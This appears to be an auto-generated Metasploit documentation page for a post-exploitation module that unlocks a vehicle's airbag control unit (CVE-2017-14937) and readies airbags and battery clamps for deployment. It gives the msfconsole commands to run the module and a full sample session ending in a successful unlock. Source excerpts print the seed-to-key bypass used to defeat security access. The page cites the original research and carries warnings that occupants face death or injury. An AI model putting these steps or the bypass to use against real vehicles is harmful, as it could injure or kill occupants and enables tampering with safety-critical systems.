Check For and Prep the Pyrotechnic Devices (Airbags, Battery Clamps, etc.) - Metasploit
This page contains detailed information about how to use the post/hardware/automotive/pdt metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Check For and Prep the Pyrotechnic Devices (Airbags, Battery Clamps, etc.)
Module: post/hardware/automotive/pdt
Source code: modules/post/hardware/automotive/pdt.rb
Disclosure date: -
Last modification time: 2020-09-22 02:56:51 +0000
Supported architecture(s): -
Supported platform(s): Hardware
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2017-14937
Acting in the role of a Pyrotechnical Device Deployment Tool (PDT), this module will first query all Pyrotechnic Control Units (PCUs) in the target vehicle to discover how many pyrotechnic devices are present, then attempt to validate the security access token using the default simplified algorithm. On success, the vehicle will be in a state that is prepped to deploy its pyrotechnic devices (e.g. airbags, battery clamps, etc.) via the service routine. (ISO 26021)
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
There are two ways to execute this post module.
From the Meterpreter prompt
The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:
meterpreter > run post/hardware/automotive/pdt
From the msf prompt
The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.
msf > use post/hardware/automotive/pdt
msf post(pdt) > show options
... show and set options ...
msf post(pdt) > set SESSION session-id
msf post(pdt) > exploit
If you wish to run the post against all sessions from framework, here is how:
1 - Create the following resource script:
framework.sessions.each_pair do |sid, session|
run_single("use post/hardware/automotive/pdt")
run_single("set SESSION #{sid}")
run_single("run")
end
2 - At the msf prompt, execute the above resource script:
msf > resource path-to-resource-script
Required Options
- SESSION: The session to run this module on.
Knowledge Base
Acting in the role of a Pyrotechnical Device Deployment Tool (PDT), this module will first query all Pyrotechnic Control Units (PCUs) in the target vehicle to discover how many pyrotechnic devices are present, then attempt to validate the security access token using the default simplified algorithm. On success, the vehicle will be in a state that is prepped to deploy its pyrotechnic devices (e.g. airbags, battery clamps, etc.) via the service routine. (ISO 26021)
This module is based on research by Johannes Braun and Juergen Duerrwang, which you can read more about here along with related CVE-2017-14937.
Options
SRCID
This is the SRC CAN ID for the PCU connection. Default is 0x7F1.
DSTID
This is the CAN ID of the expected response. Default is 0x7F9.
CANBUS
Determines which CAN bus to communicate on. Type 'supported_buses' for valid options.
PADDING
Optional byte-value to use for padding all CAN bus packets to an 8-byte length. Padding is disabled by default.
Scenarios
A successful unlock and prepped-to-deploy of pyrotechnic devices in a target vehicle:
$ ./msfconsole -q
msf > use auxiliary/server/local_hwbridge
msf auxiliary(local_hwbridge) > set uripath /
uripath => /
msf auxiliary(local_hwbridge) > run
[*] Auxiliary module running as background job 0.
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://10.0.2.4:8080/
[*] Server started.
msf auxiliary(local_hwbridge) > use auxiliary/client/hwbridge/connect
msf auxiliary(connect) > run
[*] Attempting to connect to 127.0.0.1...
[*] Hardware bridge interface session 1 opened (127.0.0.1 -> 127.0.0.1) at 2017-12-17 10:41:27 -0600
[+] HWBridge session established
[*] HW Specialty: {"automotive"=>true} Capabilities: {"can"=>true, "custom_methods"=>true}
[!] NOTICE: You are about to leave the matrix. All actions performed on this hardware bridge
[!] could have real world consequences. Use this module in a controlled testing
[!] environment and with equipment you are authorized to perform testing on.
[*] Auxiliary module execution completed
msf auxiliary(connect) > sessions -i 1
[*] Starting interaction with 1...
hwbridge >
hwbridge > run post/hardware/automotive/pdt canbus=
[*] Gathering Data...
[*] VIN: 5555
[*] Loop info (1 pyrotechnic devices):
[*] 69 | battery clamp main battery
[*] | Deployment Status: Fail ()
[*] Number of PCUs in vehicle | 1
[*] Info About First PCU
[*] Address format this PCU(s) | 11 bit normal addressing
[*] Number of pyrotechnic charges | 1
[*] Version of ISO26021 standard | 1
[*] ACL type | CAN only
[*] ACL Type version | 1
[*]
[*] Switching to Diagnostic Session 0x04...
[*] Getting Security Access Seed...
[*] Success. Seed: ["01", "CF", "00", "00", "00"]
[*] Attempting to unlock device...
[*] Success!
[!] Warning! You are now able to start the deployment of airbags in this vehicle
[!] *** OCCUPANTS OF THE VEHICLE FACE POTENTIAL DEATH OR INJURY ***
Go back to menu.
Msfconsole Usage
Here is how the hardware/automotive/pdt post exploitation module looks in the msfconsole:
msf6 > use post/hardware/automotive/pdt
msf6 post(hardware/automotive/pdt) > show info
Name: Check For and Prep the Pyrotechnic Devices (Airbags, Battery Clamps, etc.)
Module: post/hardware/automotive/pdt
Platform: Hardware
Arch:
Rank: Normal
Provided by:
Johannes Braun
Juergen Duerrwang
Craig Smith
Compatible session types:
Hwbridge
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
CANBUS no CAN Bus to perform scan on, defaults to connected bus
DSTID 2041 no Expected reponse ID, defaults to SRCID + 8
PADDING 0 no Pad the packet with extra bytes to always be 8 bytes long
SESSION yes The session to run this module on.
SRCID 2033 yes Module ID to query
Description:
Acting in the role of a Pyrotechnical Device Deployment Tool (PDT),
this module will first query all Pyrotechnic Control Units (PCUs) in
the target vehicle to discover how many pyrotechnic devices are
present, then attempt to validate the security access token using
the default simplified algorithm. On success, the vehicle will be in
a state that is prepped to deploy its pyrotechnic devices (e.g.
airbags, battery clamps, etc.) via the service routine. (ISO 26021)
References:
https://nvd.nist.gov/vuln/detail/CVE-2017-14937
https://www.researchgate.net/publication/321183727_Security_Evaluation_of_an_Airbag-ECU_by_Reusing_Threat_Modeling_Artefacts
Module Options
This is a complete list of options available in the hardware/automotive/pdt post exploitation module:
msf6 post(hardware/automotive/pdt) > show options
Module options (post/hardware/automotive/pdt):
Name Current Setting Required Description
---- --------------- -------- -----------
CANBUS no CAN Bus to perform scan on, defaults to connected bus
DSTID 2041 no Expected reponse ID, defaults to SRCID + 8
PADDING 0 no Pad the packet with extra bytes to always be 8 bytes long
SESSION yes The session to run this module on.
SRCID 2033 yes Module ID to query
Advanced Options
Here is a complete list of advanced options supported by the hardware/automotive/pdt post exploitation module:
msf6 post(hardware/automotive/pdt) > show advanced
Module advanced options (post/hardware/automotive/pdt):
Name Current Setting Required Description
---- --------------- -------- -----------
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Post Actions
This is a list of all post exploitation actions which the hardware/automotive/pdt module can do:
msf6 post(hardware/automotive/pdt) > show actions
Post actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the hardware/automotive/pdt post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 post(hardware/automotive/pdt) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
- error
- Could not switch to DSC 0x04: <ERROR>
- error
- Couldn't get seed: <ERROR>
- error
- Invalid SA Response. System not vulnerable. Error: <ERROR>
- Unknown response: <RESP.INSPECT>
- Warning! You are now able to start the deployment of airbags in this vehicle
- *** OCCUPANTS OF THE VEHICLE FACE POTENTIAL DEATH OR INJURY ***
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
error
Here is a relevant code snippet related to the "error" error message:
259: print_status(" ACL type | #{ACL_TYPES[acl_type_definition.hex]}")
260: print_status(" ACL Type version | #{acl_type_version.hex}")
261: print_status
262: print_status('Switching to Diagnostic Session 0x04...')
263: resp = set_dsc(datastore['CANBUS'], datastore['SRCID'], datastore['DSTID'], 0x04, opt)
264: if resp.key? 'error'
265: print_error("Could not switch to DSC 0x04: #{resp['error']}")
266: return
267: end
268: # We may not need tester present at all because we will perform the action quickly
269: send_tester_present(datastore['CANBUS'], datastore['SRCID'], datastore['DSTID'], opt)
Could not switch to DSC 0x04: <ERROR>
Here is a relevant code snippet related to the "Could not switch to DSC 0x04: <ERROR>" error message:
260: print_status(" ACL Type version | #{acl_type_version.hex}")
261: print_status
262: print_status('Switching to Diagnostic Session 0x04...')
263: resp = set_dsc(datastore['CANBUS'], datastore['SRCID'], datastore['DSTID'], 0x04, opt)
264: if resp.key? 'error'
265: print_error("Could not switch to DSC 0x04: #{resp['error']}")
266: return
267: end
268: # We may not need tester present at all because we will perform the action quickly
269: send_tester_present(datastore['CANBUS'], datastore['SRCID'], datastore['DSTID'], opt)
270: print_status('Getting Security Access Seed...')
error
Here is a relevant code snippet related to the "error" error message:
267: end
268: # We may not need tester present at all because we will perform the action quickly
269: send_tester_present(datastore['CANBUS'], datastore['SRCID'], datastore['DSTID'], opt)
270: print_status('Getting Security Access Seed...')
271: seed = get_security_token(datastore['CANBUS'], datastore['SRCID'], datastore['DSTID'], 0x5F, opt)
272: if seed.key? 'error'
273: print_error("Couldn't get seed: #{seed['error']}")
274: return
275: end
276: print_status("Success. Seed: #{seed['SEED']}")
277: print_status('Attempting to unlock device...')
Couldn't get seed: <ERROR>
Here is a relevant code snippet related to the "Couldn't get seed: <ERROR>" error message:
268: # We may not need tester present at all because we will perform the action quickly
269: send_tester_present(datastore['CANBUS'], datastore['SRCID'], datastore['DSTID'], opt)
270: print_status('Getting Security Access Seed...')
271: seed = get_security_token(datastore['CANBUS'], datastore['SRCID'], datastore['DSTID'], 0x5F, opt)
272: if seed.key? 'error'
273: print_error("Couldn't get seed: #{seed['error']}")
274: return
275: end
276: print_status("Success. Seed: #{seed['SEED']}")
277: print_status('Attempting to unlock device...')
278: display_warning = false
error
Here is a relevant code snippet related to the "error" error message:
280: print_status('Security Access Already Unlocked!!')
281: display_warning = true
282: else
283: key = [0xFF - seed['SEED'][0].hex, 0xFF - seed['SEED'][1].hex]
284: resp = send_security_token_response(datastore['CANBUS'], datastore['SRCID'], datastore['DSTID'], key, 0x60, opt)
285: if (resp.key? 'error') && !(resp['error'].key? 'RCRRP')
286: print_error("Invalid SA Response. System not vulnerable. Error: #{resp['error']}")
287: return
288: end
289: found_valid = false
290: if (resp.key? 'Packets') && resp['Packets'].size > 0
Invalid SA Response. System not vulnerable. Error: <ERROR>
Here is a relevant code snippet related to the "Invalid SA Response. System not vulnerable. Error: <ERROR>" error message:
281: display_warning = true
282: else
283: key = [0xFF - seed['SEED'][0].hex, 0xFF - seed['SEED'][1].hex]
284: resp = send_security_token_response(datastore['CANBUS'], datastore['SRCID'], datastore['DSTID'], key, 0x60, opt)
285: if (resp.key? 'error') && !(resp['error'].key? 'RCRRP')
286: print_error("Invalid SA Response. System not vulnerable. Error: #{resp['error']}")
287: return
288: end
289: found_valid = false
290: if (resp.key? 'Packets') && resp['Packets'].size > 0
291: resp['Packets'].each do |i|
Unknown response: <RESP.INSPECT>
Here is a relevant code snippet related to the "Unknown response: <RESP.INSPECT>" error message:
294: end
295: if found_valid
296: print_status('Success!')
297: display_warning = true
298: else
299: print_error("Unknown response: #{resp.inspect}")
300: end
301: end
302: if display_warning
303: print_warning('Warning! You are now able to start the deployment of airbags in this vehicle')
304: print_warning('*** OCCUPANTS OF THE VEHICLE FACE POTENTIAL DEATH OR INJURY ***')
Warning! You are now able to start the deployment of airbags in this vehicle
Here is a relevant code snippet related to the "Warning! You are now able to start the deployment of airbags in this vehicle" error message:
298: else
299: print_error("Unknown response: #{resp.inspect}")
300: end
301: end
302: if display_warning
303: print_warning('Warning! You are now able to start the deployment of airbags in this vehicle')
304: print_warning('*** OCCUPANTS OF THE VEHICLE FACE POTENTIAL DEATH OR INJURY ***')
305: end
306: end
307:
308: end
*** OCCUPANTS OF THE VEHICLE FACE POTENTIAL DEATH OR INJURY ***
Here is a relevant code snippet related to the "*** OCCUPANTS OF THE VEHICLE FACE POTENTIAL DEATH OR INJURY ***" error message:
298: else
299: print_error("Unknown response: #{resp.inspect}")
300: end
301: end
302: if display_warning
303: print_warning('Warning! You are now able to start the deployment of airbags in this vehicle')
304: print_warning('*** OCCUPANTS OF THE VEHICLE FACE POTENTIAL DEATH OR INJURY ***')
305: end
306: end
307:
308: end
Go back to menu.
Related Pull Requests
- #14202 Merged Pull Request: Implement the zeitwerk autoloader within lib/msf/core
- #12205 Merged Pull Request: Update module and generate splats from http:// to https://
- #9312 Merged Pull Request: Module acting as a Pyrotechnical Device Deployment Tool (PDT) for Hardware Bridge
References
- CVE-2017-14937
- https://www.researchgate.net/publication/321183727_Security_Evaluation_of_an_Airbag-ECU_by_Reusing_Threat_Modeling_Artefacts
See Also
Check also the following modules related to this module:
- post/hardware/automotive/can_flood
- post/hardware/automotive/canprobe
- post/hardware/automotive/diagnostic_state
- post/hardware/automotive/ecu_hard_reset
- post/hardware/automotive/getvinfo
- post/hardware/automotive/identifymodules
- post/hardware/automotive/malibu_overheat
- post/hardware/automotive/mazda_ic_mover
Authors
- Johannes Braun
- Juergen Duerrwang
- Craig Smith
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.